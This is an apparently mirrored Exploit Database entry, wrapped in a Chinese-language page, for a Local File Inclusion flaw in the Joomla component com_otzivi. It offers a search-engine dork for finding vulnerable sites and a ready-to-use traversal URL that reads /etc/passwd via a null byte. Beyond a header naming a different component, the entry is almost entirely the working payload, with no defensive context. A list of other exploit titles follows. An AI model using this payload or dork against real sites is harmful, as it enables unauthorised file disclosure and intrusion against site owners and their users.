Joomla! Component com_otzivi – Local File Inclusion

Exploit Database
11 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2010-02-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11494/

Joomla Component com_otzivi Local File Inclusion
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_ccnewsletter
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_otzivi"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_otzivi&controller=[LFI]
www.site.com/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00

####################################################################

last Exploits
Joomla! Component com_otzivi – Local File Inclusion的更多信息

Netis WF2419 2.2.36123 – Remote Code Execution：
Django 3.0 – Cross-Site Request Forgery Token Bypass：
BEESCMS 4.0 – Cross-Site Request Forgery (Add Admin)：
Pulse Pro 1.7.2 – Multiple Cross-Site Scripting Vulnerabilities：
ArcademSX 2.904 – ‘cat’ Cross-Site Scripting：
Webmin 1.850 – Multiple Vulnerabilities：
eFront 3.5.5 – ‘langname’ Local File Inclusion：
Direct News 4.10.2 – Multiple Remote File Inclusions：